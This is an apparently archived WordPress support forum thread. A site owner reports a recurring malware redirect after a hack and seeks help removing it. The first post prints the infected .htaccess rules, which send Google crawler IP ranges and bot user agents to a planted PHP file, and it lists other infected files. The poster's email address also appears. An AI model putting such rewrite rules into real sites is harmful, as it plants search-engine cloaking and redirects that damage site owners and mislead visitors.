WordPress.org

Ready to get started?Download WordPress

Forums

[closed] backdoor trojan in PHP (2 posts)

  1. paulbanks05
    Member
    Posted 4 years ago #

    So after going through almost all of the steps listed here-

    http://codex.wordpress.org/FAQ_My_site_was_hacked

    I'm still showing a malware re-direct on my WP built site. It doesn't show up all time, just enough to be re-occuring enough to decimate my traffic and a re-direct to mainnetsoll.com after a clean install of WP, and removal of the infected

    -htaccess file, which looked like this:

    RewriteEngine on

    RewriteBase /

    RewriteCond %{HTTP_HOST} (^|www.)thesportsbank.net

    RewriteCond %{REQUEST_FILENAME} ![^a-zA-Z0-9](css|js|jpe?g| gif|png|zip|swf|doc|xls|pdf| ico|tar|gz|bmp|rar|mp3|avi| mpeg|flv)(\?|$)

    RewriteCond %{REMOTE_ADDR} ^66\.249\.[6-9][0-9]\.[0-9]+$ [OR]

    RewriteCond %{REMOTE_ADDR} ^74\.125\.[0-9]+\.[0-9]+$ [OR]

    RewriteCond %{REMOTE_ADDR} ^64\.233\.1[6-9][0-9]\.[0-9]+$ [OR]

    RewriteCond %{HTTP_USER_AGENT} (google|msnbot|[Ss]lurp)

    RewriteRule ^(.*)$ core/wp-admin/includes/media. class.php [L]

    These files were also infected
    wp-admin\includes\media.class.php
    wp-content\themes\classic\functions.php
    wp-includes\js\tinymce\plugins\spellchecker\classes\utils\utils.php

    here's a description of the original attack
    http://www.derekfountain.org/security_c99madshell.php

    It may have been on the back-end, as I was one of those WP blogs brought down on Network Solutions server on Sun. detailed here

    http://wordpress.org/development/2010/04/file-permissions/

    luckily, I purchased a new hosting package on another more secure host, and with the help of my regular programmer move everything over this weekend.

    I have a couple very experienced and extremely knowledgeable people on this right now, but not full time and I'm genuinely worried that this problem may be extremely severe, and may require someone who could devote more time to it.

    Because we keep removing the malicious code, and yet the re-direct keeps coming back. I can provide a copy of the bad code if needs be, to help speed along the recovery process, but I may need to hire another, very advanced php programmer, know anyone? I want to get this fixed ASAP and will spend the money to do so for someone who can attack it full time.

    my email paulb05@hotmail.com

  2. esmi
    Theme Diva & Forum Moderator
    Posted 4 years ago #

Topic Closed

This topic has been closed to new replies.

About this Topic